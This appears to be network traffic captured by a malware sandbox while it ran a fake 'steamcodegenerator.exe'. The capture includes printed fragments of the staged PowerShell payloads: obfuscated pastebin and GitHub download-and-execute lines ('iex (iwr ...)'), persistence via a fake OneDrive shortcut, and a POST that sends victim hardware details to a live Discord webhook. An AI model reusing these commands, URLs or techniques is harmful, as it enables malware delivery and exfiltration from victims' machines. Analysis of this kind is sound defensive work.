Oct 15, 2024 15:59:51.573410988 CEST | 192.168.2.4 | 1.1.1.1 | 0x30d8 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.453298092 CEST | 192.168.2.4 | 1.1.1.1 | 0xd6a | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:59:26.040072918 CEST | 1.1.1.1 | 192.168.2.4 | 0xb720 | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:27.501832962 CEST | 1.1.1.1 | 192.168.2.4 | 0xc429 | No error (0) | objects.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:27.501832962 CEST | 1.1.1.1 | 192.168.2.4 | 0xc429 | No error (0) | objects.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:27.501832962 CEST | 1.1.1.1 | 192.168.2.4 | 0xc429 | No error (0) | objects.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:27.501832962 CEST | 1.1.1.1 | 192.168.2.4 | 0xc429 | No error (0) | objects.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:32.546056032 CEST | 1.1.1.1 | 192.168.2.4 | 0x9092 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:32.546056032 CEST | 1.1.1.1 | 192.168.2.4 | 0x9092 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:32.546056032 CEST | 1.1.1.1 | 192.168.2.4 | 0x9092 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:32.546056032 CEST | 1.1.1.1 | 192.168.2.4 | 0x9092 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:51.581504107 CEST | 1.1.1.1 | 192.168.2.4 | 0x30d8 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:51.581504107 CEST | 1.1.1.1 | 192.168.2.4 | 0x30d8 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:51.581504107 CEST | 1.1.1.1 | 192.168.2.4 | 0x30d8 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.461483955 CEST | 1.1.1.1 | 192.168.2.4 | 0xd6a | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.461483955 CEST | 1.1.1.1 | 192.168.2.4 | 0xd6a | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.461483955 CEST | 1.1.1.1 | 192.168.2.4 | 0xd6a | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.461483955 CEST | 1.1.1.1 | 192.168.2.4 | 0xd6a | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:52.461483955 CEST | 1.1.1.1 | 192.168.2.4 | 0xd6a | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
• github.com
• objects.githubusercontent.com
• raw.githubusercontent.com
• pastebin.com
• discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 185.199.109.133 | 80 | 7744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:32.567075014 CEST | 223 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:59:33.161463976 CEST | 542 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:59:33 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210063-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000773.096975,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:04:33 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 172.67.19.24 | 80 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:51.594091892 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:59:52.218569040 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:59:52 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:59:52 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d305506dedb2cbb-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449743185.199.109.133805660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 15, 2024 15:59:53.106467962 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 15:59:53.728348970 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Length: 0
                                                                      Server: Varnish
                                                                      Retry-After: 0
                                                                      Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:53 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdal2120056-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000794.666717,VS0,VE0
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Expires: Tue, 15 Oct 2024 14:04:53 GMT
                                                                      Vary: Authorization,Accept-Encoding


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.4 | 49745 | 172.67.19.24 | 80 | 7248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 15, 2024 15:59:59.908361912 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 16:00:00.529232025 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 167
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Tue, 15 Oct 2024 15:00:00 GMT
                                                                      Location: https://pastebin.com/raw/sA04Mwk2
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30553ade9b4763-DFW
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.4 | 49747 | 185.199.109.133 | 80 | 7248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 15, 2024 16:00:01.348216057 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      Oct 15, 2024 16:00:02.198314905 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Length: 0
                                                                      Server: Varnish
                                                                      Retry-After: 0
                                                                      Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdal2120039-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000802.891102,VS0,VE0
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                                      Vary: Authorization,Accept-Encoding


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.4 | 49735 | 140.82.121.3 | 443 | 7500 | C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-10-15 13:59:27 UTC | 124 | OUT | GET /user-attachments/files/17267811/stm.txt HTTP/1.1
                                                                      User-Agent: Downloader
                                                                      Host: github.com
                                                                      Cache-Control: no-cache
                                                                      2024-10-15 13:59:27 UTC | 940 | IN | HTTP/1.1 302 Found
                                                                      Server: GitHub.com
                                                                      Date: Tue, 15 Oct 2024 13:59:27 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                      Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain
                                                                      Cache-Control: no-cache
                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                      X-Frame-Options: deny
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                      2024-10-15 13:59:27 UTC | 4052 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.4 | 49736 | 185.199.109.133 | 443 | 7500 | C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-10-15 13:59:28 UTC | 549 | OUT | GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1
                                                                      User-Agent: Downloader
                                                                      Cache-Control: no-cache
                                                                      Host: objects.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:28 UTC | 654 | IN | HTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 39510
                                                                      x-amz-id-2: 2yQ2hjkaXDvxiRk3rcYUbcQmpz6nFMYhmpjklQvgJQUZ7HPF7GoL4dKnLWTH17X0VLM2Ls+FV8IYEsqOEeoynn+pEgQuH/LQmd2pAS+mRBE=
                                                                      x-amz-request-id: QHWNM55YC6JSNR9P
                                                                      Last-Modified: Sun, 06 Oct 2024 01:36:28 GMT
                                                                      ETag: "ebe145bd87e74b4bca45e87525372f04"
                                                                      x-amz-server-side-encryption: AES256
                                                                      Content-Disposition: attachment;filename=stm.txt
                                                                      Content-Type: text/plain
                                                                      Server: AmazonS3
                                                                      Fastly-Restarts: 1
                                                                      Accept-Ranges: bytes
                                                                      Age: 432
                                                                      Date: Tue, 15 Oct 2024 13:59:28 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210095-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000768.176668,VS0,VE0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.4 | 49738 | 185.199.109.133 | 443 | 7744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-10-15 13:59:33 UTC | 223 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 13:59:34 UTC | 899 | IN | HTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7084
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "19c34b01bc0de3420610e902b58491f6f98d61c6733fbdc38504b32046860435"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: 9790:3FFFA2:8979E5:95DF38:670E73A3
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:33 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210083-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000774.865860,VS0,VE89
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: c0fe96e4d6af2b445297b8007de5d4eaad1345f4
                                                                      Expires: Tue, 15 Oct 2024 14:04:33 GMT
                                                                      Source-Age: 0
                                                                      2024-10-15 13:59:34 UTC | 1378 | IN | Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                      2024-10-15 13:59:34 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                                      Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                                                       2024-10-15 13:59:34 UTC | 194 | IN | Data Ascii: "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                                       Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 172.67.19.244 | Destination Port: 443 | PID: 5660 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 13:59:52 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                       2024-10-15 13:59:53 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 13:59:52 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-frame-options: DENY
                                                                      x-content-type-options: nosniff
                                                                      x-xss-protection: 1;mode=block
                                                                      cache-control: public, max-age=1801
                                                                      CF-Cache-Status: HIT
                                                                      Age: 442
                                                                      Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30550c2d7c2e51-DFW
                                                                       2024-10-15 13:59:53 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                       2024-10-15 13:59:53 UTC | 5 | IN | Data Ascii: 0


                                                                       Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 162.159.138.232 | Destination Port: 443 | PID: 7744 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 13:59:53 UTC | 311 | OUT | POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Content-Type: application/json
                                                                      Host: discord.com
                                                                      Content-Length: 213
                                                                      Connection: Keep-Alive
                                                                       2024-10-15 13:59:53 UTC | 213 | OUT | Data Ascii: { "content": "**user** has joined - stm\n----------------------------------\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                       2024-10-15 13:59:53 UTC | 1255 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 15 Oct 2024 13:59:53 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 45
                                                                      Connection: close
                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1729000794
                                                                      x-ratelimit-reset-after: 1
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWnV7TPvkg5LZKvrTXlOvT%2BEdxRSZVjQR2VHBvQhjXYCguoQolUzOZJtES0lyG%2BnICdJwdZcwfOQEn97tnR8NAh1SKuQGHTtgI%2FOJJHa3khkNkjOBTA3SH4bdh29"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: __cfruid=b96900f5ee5ff634769fa70e31a8093c5cc2c686-1729000793; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: _cfuvid=B9oNm1iH5MaqkqTXcdybFvpTlS5n6AwSsI_dOXK08Wk-1729000793263-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30550d4c198d2d-DFW
                                                                       2024-10-15 13:59:53 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                       Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 185.199.109.133 | Destination Port: 443 | PID: 5660 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 13:59:54 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                       2024-10-15 13:59:54 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7508
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 13:59:54 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210162-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1729000794.418035,VS0,VE110
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: 188e010a3a0b863dba1cbcbf5a537530e2b0c590
                                                                      Expires: Tue, 15 Oct 2024 14:04:54 GMT
                                                                      Source-Age: 0
                                                                       2024-10-15 13:59:54 UTC | 1378 | IN | Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                       2024-10-15 13:59:54 UTC | 1378 | IN | Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                       2024-10-15 13:59:54 UTC | 618 | IN | Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                       Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 172.67.19.244 | Destination Port: 443 | PID: 7248 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 14:00:01 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                       2024-10-15 14:00:01 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-frame-options: DENY
                                                                      x-content-type-options: nosniff
                                                                      x-xss-protection: 1;mode=block
                                                                      cache-control: public, max-age=1801
                                                                      CF-Cache-Status: HIT
                                                                      Age: 451
                                                                      Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30553fbc872cb0-DFW
                                                                       2024-10-15 14:00:01 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                       2024-10-15 14:00:01 UTC | 5 | IN | Data Ascii: 0


                                                                       Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 185.199.109.133 | Destination Port: 443 | PID: 7248 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 14:00:02 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                       2024-10-15 14:00:03 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7508
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 14:00:03 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210077-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 1
                                                                      X-Timer: S1729000803.008550,VS0,VE1
                                                                      Vary: Authorization,Accept-Encoding,Origin
